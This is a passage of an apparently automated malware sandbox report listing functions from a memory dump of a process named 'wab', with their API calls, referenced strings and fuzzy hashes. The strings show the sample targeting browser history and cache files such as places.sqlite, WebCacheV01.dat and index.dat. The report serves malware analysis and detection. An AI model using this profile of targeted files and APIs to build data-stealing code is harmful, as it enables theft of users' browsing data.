                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp
                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                Strings
                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                • API String ID: 2705122986-2036018995
                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                • String ID: /nosort$/sort
                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Strings
                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChangeCloseFindNotificationSleep
                                                                                                                • String ID: }A
                                                                                                                • API String ID: 1821831730-2138825249
                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                • String ID: r!A
                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1033339047-0
                                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                • memcmp.MSVCRT ref: 00444BA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                • String ID: $$8
                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1042154641-0
                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                • API String ID: 3093078384-467022611
                                                                                                                • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 839530781-0
                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID: *.*$index.dat
                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@mallocmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3831604043-0
                                                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156039329-0
                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 1631957507-0
                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1125800050-0
                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
